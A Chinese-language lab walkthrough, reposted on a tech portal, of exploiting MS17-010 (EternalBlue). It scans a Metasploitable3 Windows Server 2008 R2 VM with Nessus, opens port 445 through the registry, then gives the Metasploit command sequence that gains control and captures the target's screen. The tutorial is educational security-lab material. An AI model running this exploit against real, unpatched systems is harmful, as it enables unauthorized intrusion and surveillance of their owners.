IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> kail环境下msf框架攻击ms17-010(永恒之蓝)漏洞演示 -> 正文阅读

[系统运维]kail环境下msf框架攻击ms17-010(永恒之蓝)漏洞演示

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


前言

MS17-010(永恒之蓝)是一种操作系统漏洞,他的爆发源于WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。

实验环境

物理机:win 11 (需要安装nessuss工具:系统漏洞扫描与分析)
虚拟机:kali2021;靶机metasploitable3-win2k8(windows server 2008 r2)
实验条件:两台虚拟机可以ping通,且靶机的445端口需要打开。(后续进行操作)

一、物理机下载安装 nessuss

1.安装

下载地址:https://www.tenable.com/downloads/nessus

①选择“get activation code”申请激活码,注册家庭免费版(Nessus Essentials )即可。(此步也可跳过,在后面领取激活码也可以。)
在这里插入图片描述

②按操作系统选择下载,没有找到windows64位,这里下载了windows服务器版64位的:
在这里插入图片描述
③双击下载的安装包进行安装,一直Next即可:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2.使用

①浏览器访问:http://localhost:8834即可打开Nessus,如打开浏览器报错选择高级\进阶继续访问就行,点击‘Connect via SSL’
在这里插入图片描述

②选择第一个选项家庭免费版,限制16个IP

③如果有激活码就跳过输入信息,直接输入激活码,如果没有就输入邮箱号领取激活码:
在这里插入图片描述

④创建一个用户登录Nessus:
在这里插入图片描述

⑤等待它下载完成:
在这里插入图片描述

到此就安装完成了

在这里插入图片描述

二、使用nessuss工具扫描靶机

nessuss使用:New Scan–选择扫描模板–输入扫描的名称–扫描的IP–save–点击‘三角形’–双击查看扫描进度和结果

①打开靶机metasploitable3-win2k8(vagrant),查看ip地址:192.168.119.143
在这里插入图片描述

②打开nessuss,选择my scan ->create a new scan ->basic network scan ,输入靶机ip,等待扫描结果:
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

②扫描完毕,红色为高危漏洞,在测试时重点测试
在这里插入图片描述

攻击cve-2019-0708 漏洞可以导致靶机蓝屏重启,获取控制权未实现
攻击ms11-030测试未成功
攻击ms 12-020漏洞可以导致靶机蓝屏重启
攻击ms17-010漏洞可以经测试可以获取主机控制权

三、靶机开启445端口

①点击电脑左下的"开始",选择所有程序,选附件,运行,输入regedit,然后回车
在这里插入图片描述

②打开注册表后,找到HKEY_LOCAL_MACHINE,在HKEY_LOCAL_MACHINE中依次打开System——CurrentControlSet——Services——NetBT——Parameters
在这里插入图片描述

③如已关闭445端口,可以看到SMBDeviceEnabled这个项,那么其类型为REG_DWORD,右键点击项目修改,修改数值为1。如没有这个项目,那么在Parameters目录下添加一个DWORD键值名称:SMBDeviceEnabled:

在这里插入图片描述

在这里插入图片描述

④重新启动计算机,cmd输入netstat -an,然后回车netstat -an,可以看到已打开445端口。
在这里插入图片描述

四、使用kali攻击靶机

①打开kali,启动msf框架攻击ms17-010,启动框架命令

 msfconsole

在这里插入图片描述

②用search命令查找攻击漏洞工具:

search ms17-010

在这里插入图片描述

③使用攻击模块 :

use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述

④设置靶机ip地址:

set rhosts 192.168.119.143

在这里插入图片描述

⑤查看攻击参数设置,核对ip地址:

options

在这里插入图片描述

⑥开始攻击:

run

exploit

出现:Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)确认漏洞存在。

在这里插入图片描述

⑦截取主机当前屏幕:

screenshot

在这里插入图片描述

⑧去目录查看,可以看到截到的靶机屏幕图像,攻击成功:
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-04-24 09:50:00  更:2022-04-24 09:50:12 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 20:07:41-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码